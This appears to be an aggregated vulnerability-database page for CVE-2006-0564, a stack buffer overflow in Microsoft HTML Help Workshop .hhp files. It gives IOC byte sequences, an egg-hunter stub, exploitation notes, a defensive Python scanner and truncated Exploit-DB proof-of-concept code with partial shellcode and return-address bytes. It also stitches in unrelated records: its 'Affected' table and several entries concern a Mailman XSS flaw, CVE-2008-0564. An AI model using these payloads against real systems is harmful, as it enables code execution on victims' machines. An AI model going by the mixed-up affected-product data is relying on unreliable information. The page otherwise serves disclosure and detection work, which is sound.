CVE-2006-0564
Published: 2006-02-06
Priority P3 · 48 · high · CVSS 2.0 base score 7.5 · AV:N/AC:L/Au:N/C:P/I:P/A:P
Tags: EXPLOIT
EPSS: 71.46% (99.3rd percentile)
Stack-based buffer overflow in Microsoft HTML Help Workshop 4.74.8702.0, and possibly earlier versions, and as included in the Microsoft HTML Help 1.4 SDK, allows context-dependent attackers to execute arbitrary code via a .hhp file with a long Contents file field.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| gnu | mailman | >= 0 < 1:2.1.10~b3-1 | 1:2.1.10~b3-1 |
| microsoft | html_help | — | — |
| microsoft | html_help_workshop | — | — |
| microsoft | html_help_workshop | — | — |
Detection & IOCs (extracted from sources)
- bytes: \x5d\x38\x82\x7c (JMP ESP return address, repeated)
- bytes: \x5d\x38\x82\x7c (JMP ESP, used at offsets 272-292)
- bytes: \x77\xe8\x59\xba (return address at overflow[280])
- bytes: \x93\x1f\x40\x00 (Call EDI - hhw.exe universal)
- bytes: egg hunter stub: \x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8\x69\x72\x61\x71\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7
- bytes: egg tag marker: \x69\x72\x61\x71\x69\x72\x61\x71 (iraqiraq)
- Exploit .hhp files contain NOP sleds (0x90) followed by shellcode in the 'Compiled file=' or 'Contents file=' field; look for large blocks of 0x90 bytes in .hhp file fields.
- Exploit .hhp files use the egg-hunter tag bytes 'iraq' (\x69\x72\x61\x71) doubled as the egg marker preceding shellcode in the [FILES] section.
- Return address 0x7C82385D (JMP ESP in a Windows XP system DLL) appears repeatedly at the EIP overwrite offset (~272 bytes into the overflow buffer); flag .hhp files containing this byte sequence.
- Return address 0x00401F93 (CALL EDI in hhw.exe v4.74.8702.0) is used by the Metasploit module at offset 242 bytes into the overflow; presence of bytes \x93\x1f\x40\x00 at that offset in a .hhp file is a strong indicator.
- The Metasploit module sets BadChars to null bytes, newlines, carriage returns, SUB, forward-slash, and backslash, meaning shellcode containing these bytes will not work; payloads must be encoded to avoid them.
- The Metasploit module uses a StackAdjustment of -4800 bytes to ensure the stack pointer does not corrupt the payload during execution.
- The return address 0x7C82385D (JMP ESP) is specific to Windows XP SP2 system DLLs and will not be valid on other OS versions or patch levels.
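The indicators above can be checked mechanically. The scanner below is an added example (not from any of the sources indexed on this page); its length thresholds and both sample files are constructed, and the byte sequences it looks for are the ones quoted in the IOC list.

```python
"""Heuristic scanner for .hhp project files, built from the indicators listed
above: oversized [OPTIONS] path fields, 0x90 NOP sleds, the quoted return
addresses and the 'iraqiraq' egg tag. Thresholds and samples are constructed."""
import re

# Fields the public PoCs overflow (Contents file, Compiled file, Index file).
OVERFLOW_FIELDS = (b"contents file", b"compiled file", b"index file")
MAX_FIELD_LEN = 200   # constructed threshold; the PoCs above use >= 0xe6 bytes
NOP_SLED_MIN = 16     # constructed threshold for a run of 0x90 bytes

# Byte sequences quoted in the IOC list above (little-endian return addresses, egg tag).
KNOWN_BYTES = {
    b"\x5d\x38\x82\x7c": "0x7C82385D JMP ESP (Windows XP SP2 system DLL)",
    b"\x93\x1f\x40\x00": "0x00401F93 CALL EDI (hhw.exe 4.74.8702.0)",
    b"\x77\xe8\x59\xba": "return address used at overflow[280]",
    b"iraqiraq": "egg-hunter tag",
}

def scan_hhp(data: bytes) -> list:
    """Return human-readable findings for one .hhp file; an empty list means clean."""
    findings = []
    section = b""
    for raw in data.splitlines():          # bytes.splitlines: \r\n, \n or \r only
        line = raw.strip()
        if line.startswith(b"[") and line.endswith(b"]"):
            section = line[1:-1].lower()
            continue
        if section == b"options" and b"=" in line:
            key, value = line.split(b"=", 1)
            if key.strip().lower() in OVERFLOW_FIELDS and len(value) > MAX_FIELD_LEN:
                findings.append(f"{key.strip().decode(errors='replace')} value is {len(value)} bytes")
    sled = re.search(rb"\x90{%d,}" % NOP_SLED_MIN, data)
    if sled:
        findings.append(f"NOP sled of {len(sled.group())} bytes at offset {sled.start()}")
    for needle, label in KNOWN_BYTES.items():
        off = data.find(needle)
        if off != -1:
            findings.append(f"{label} at offset {off}")
    return findings

# Constructed samples: an ordinary project file and one shaped like the public PoCs
# (272-byte filler, JMP ESP address, NOP sled, 0xcc filler standing in for a payload).
BENIGN_HHP = (b"[OPTIONS]\r\nCompatibility=1.1 or later\r\nCompiled file=help.chm\r\n"
              b"Contents file=toc.hhc\r\n[FILES]\r\nindex.htm\r\n")
SUSPICIOUS_HHP = (b"[OPTIONS]\r\nCompiled file=" + b"A" * 272 + b"\x5d\x38\x82\x7c"
                  + b"\x90" * 32 + b"\xcc" * 8 + b"\r\n[FILES]\r\n" + b"iraqiraq" + b"\xcc" * 4 + b"\r\n")

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_HHP), ("suspicious", SUSPICIOUS_HHP)):
        print(name, scan_hhp(sample) or ["clean"])
```

Because the Metasploit BadChars exclude \r and \n, the overflowing field stays on a single line, which is why a line-oriented field-length check still catches it.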
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| osv | — | 6.8 | MEDIUM | — |
| vendor_redhat | — | 6.8 | MEDIUM | — |
GHSA
GHSA-fpp9-rfqj-mpm6: Buffer overflow in Microsoft HTML Help Workshop 4
ghsa_unreviewed · 2022-05-02 · CVSS 7.5 · CVE-2009-0133 [HIGH] · CWE-119
Buffer overflow in Microsoft HTML Help Workshop 4.74 and earlier allows context-dependent attackers to execute arbitrary code via a .hhp file with a long "Index file" field, possibly a related issue to CVE-2006-0564.
GHSA
GHSA-937c-j3f9-3p46: Stack-based buffer overflow in Microsoft HTML Help Workshop 4
ghsa_unreviewed · 2022-05-01 · CVE-2006-0564 [HIGH]
Stack-based buffer overflow in Microsoft HTML Help Workshop 4.74.8702.0, and possibly earlier versions, and as included in the Microsoft HTML Help 1.4 SDK, allows context-dependent attackers to execute arbitrary code via a .hhp file with a long Contents file field.
OSV
CVE-2008-0564: Multiple cross-site scripting (XSS) vulnerabilities in Mailman before 2
osv · 2008-02-05 · CVSS 6.8
Multiple cross-site scripting (XSS) vulnerabilities in Mailman before 2.1.10b1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors related to (1) editing templates and (2) the list's "info attribute" in the web administrator interface, a different vulnerability than CVE-2006-3636.
Red Hat
mailman: XSS triggerable by list administrator
vendor_redhat · 2008-01-03 · CVSS 6.8 · CVE-2008-0564 [MEDIUM] · CWE-79
Multiple cross-site scripting (XSS) vulnerabilities in Mailman before 2.1.10b1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors related to (1) editing templates and (2) the list's "info attribute" in the web administrator interface, a different vulnerability than CVE-2006-3636.
Package: mailman (Red Hat Enterprise Linux 6) - Not affected
No detection rules found.
Exploit-DB
Microsoft HTML Help Workshop 4.74 - '.hhp' compiled Buffer Overflow (Metasploit) (4)
exploitdb · 2010-09-25 · CVE-2006-0564
---
##
# $Id: hhw_hhp_compiledfile_bof.rb 10477 2010-09-25 11:59:02Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit',
'Description' => %q{
This module exploits a stack buffer overflow in HTML Help Workshop 4.74
By creating a specially crafted hhp file, an attacker may be able
to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'bratax', 'jduck' ],
'Version' => '$Re
Exploit-DB
Microsoft HTML Help Workshop 4.74 - '.hhp' Content Buffer Overflow (Metasploit) (2)
exploitdb · 2010-09-25 · CVE-2006-0564
---
##
# $Id: hhw_hhp_contentfile_bof.rb 10477 2010-09-25 11:59:02Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit',
'Description' => %q{
This module exploits a stack buffer overflow in HTML Help Workshop 4.74
By creating a specially crafted hhp file, an attacker may be able
to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'bratax', 'jduck' ],
'Version' => '$Revis
Exploit-DB
Microsoft HTML Help Workshop 4.74 - '.hhp' Local Buffer Overflow (1)
exploitdb · 2009-12-05 · CVE-2009-0133
---
#exploit.py
#
# HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit
# By: Encrypt3d.M!nd
# http://m1nd3d.wordpress.com/
# Based on: http://www.milw0rm.com/exploits/7727
####################################################################
# Well, I've tested SkD's exploit on Win 7 and it didn't work. I think it's
# a shellhunter compatibility problem, so I wrote this and used the egg hunting
# method. It will take some time to execute the shellcode, but it will run ;-)
#
# Tested on : Windows xp sp3
# Windows 7 ultimate
#
hhp_data1 =("\x5B\x4F\x50\x54\x49\x4F\x4E\x53"
"\x5D\x0D\x0A\x43\x6F\x6E\x74\x65"
"\x6E\x74\x73\x20\x66\x69\x6C\x65"
"\x3D\x41\x0D\x0A\x49\x6E\x64\x65"
"\x78\x20\x66\x69\x6C\x65\x3D")
crlf =("\x
Exploit-DB
Microsoft HTML Workshop 4.74 - Universal Buffer Overflow
exploitdb · 2009-01-12 · CVE-2009-0133
---
#!/usr/bin/perl
# Microsoft HTML Workshop http://msdn.microsoft.com/en-us/library/ms669985.aspx
#
# If you are interested in my method and want to learn something new or
# improve your exploitation skills then visit my team's blog at:
# -> http://abysssec.com
#
# Peace out,
# SkD.
my $hhp_data1 = "\x5B\x4F\x50\x54\x49\x4F\x4E\x53".
"\x5D\x0D\x0A\x43\x6F\x6E\x74\x65".
"\x6E\x74\x73\x20\x66\x69\x6C\x65".
"\x3D\x41\x0D\x0A\x49\x6E\x64\x65".
"\x78\x20\x66\x69\x6C\x65\x3D";
my $hhp_data2 = "\x5B\x46\x49\x4C\x45\x53\x5D\x0D".
"\x0A\x61\x2E\x68\x74\x6D";
my $crlf = "\x0d\x0a";
# win32_exec - EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\
Exploit-DB
Microsoft HTML Help Workshop - '.hhp' Local Buffer Overflow (3)
exploitdb · 2006-02-14 · CVE-2006-0564
---
/*
\ Windows HTML Help Workshop Index File Stack Overflow Exploit
/ by Darkeagle
\
/ [http://eagle.blacksecurity.org]
\
/ MS coders codes so secure code. Keep coding }:>
\
/ Original Advisory: http://eagle.blacksecurity.org/stuff/unl0ck/adv/55k700206.txt
\
/ Exploit tested in WinXP SP2 RUS.
\
*/
#include
#include
#include "stdafx.h"
char ep[]=
"[OPTIONS]\n"
"Compatibility=1.1 or later\n"
"Compiled file=XAKEP.chm\n"
"Index File=";
char pro[]=
"Display compile progress=No\n"
"Language=0x43f Казахский\n\n\n"
"[INFOTYPES]";
char shellcode[]=
"\x54\x50\x53\x50\x29\xc9\x83\xe9\xde\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x02"
"\xdd\x0e\x4d\x83\xee\xfc\xe2\xf4\xfe\x35\x4a\x4d\x02\xdd\x85\x08\x3e\x56\x72\x48"
"\x7a\xdc\xe1\xc6
Exploit-DB
Microsoft HTML Help Workshop - '.hhp' Local Buffer Overflow (2)
exploitdb · 2006-02-11 · CVE-2009-0133
---
/*
Microsoft HTML Help Workshop .hhp file Compiled File Header Buffer Overflow Exploit
The Buffer Overflow is in the Compiled File field in Options in an HHP file.
Bug found by:darkeagle
Exploit coded by:k3xji
Mail:[email protected]
Web: www.guvenliklab.com
Tested:Win XP SP2
*/
#include
#include
#include
#define BUFLEN 0xe6
char sta[]=
"[OPTIONS]\n"
"Compatibility=1.1 or later\n"
"Compiled file=";
char fin[]=
"Display compile progress=No\n"
"Language=Turkish\n\n\n"
"[INFOTYPES]";
char jmpcode[]= "\x5d\x38\x82\x7c\x5d\x38\x82\x7c\x90\x90\x90\x90\x83\xEC\x34\x90\x83\xEC\x78\x90\xFF\xE4\x90\x90";
char shellcode[]=
//Taken from ATmaCA's Execute Calc.exe shellcode.Thx.A bit lazy to call ExitProcess:P
"\x54\x50\x53\x50\x29\xc9\x83\xe9
Exploit-DB
Microsoft HTML Help Workshop - '.hhp' Denial of Service
exploitdb · 2006-02-10 · CVE-2006-0564
---
[OPTIONS]
Compatibility=1.1 or later
Compiled file=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaUUUUr0xaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Display compile progress=No
Language=0x419 Русский
[INFOTYPES]
# milw0rm.com [2006-02-10]
Exploit-DB
Microsoft HTML Help Workshop - '.hhp' Local Buffer Overflow (1)
exploitdb · 2006-02-06 · CVE-2009-0133
---
/*
Microsoft HTML Help Workshop .hhp file Buffer Overflow Exploit
by bratax (http://www.bratax.be/)
-> greets to:
all my miffm00f buddies, BuzzDee and everyone else I forgot who should be in here
-> thx to:
Curt Wilson @ SIUC (maybe you don't know why but this exploit wouldn't
exist if we didn't have that conversation a long long time ago)
nolimit & buzzdee (I used most of your realplayer .smil exploit code because I
didn't feel like writing this code from scratch :p)
-> special thx to:
duksie, dwarf & turb00 (you guys know why)
C:\htmlws>poc2
Microsoft HTML Help Workshop Buffer Overflow.
Coded by bratax (http://www.bratax.be/).
Usage: C:\htmlws\PoC2.exe
C:\htmlws>poc2 new.hhp
File written.
Open with Microsoft Help Wo
Metasploit
HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow
This module exploits a stack buffer overflow in HTML Help Workshop 4.74 by creating a specially crafted hhp file.
Metasploit
HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow
This module exploits a stack buffer overflow in HTML Help Workshop 4.74. By creating a specially crafted hhp file, an attacker may be able to execute arbitrary code.
No writeups or analysis indexed.
- http://secunia.com/advisories/18740
- http://securitytracker.com/id?1015585
- http://users.pandora.be/bratax/advisories/b008.html
- http://www.kb.cert.org/vuls/id/124460
- http://www.osvdb.org/22941
- http://www.vupen.com/english/advisories/2006/0446
- https://exchange.xforce.ibmcloud.com/vulnerabilities/24481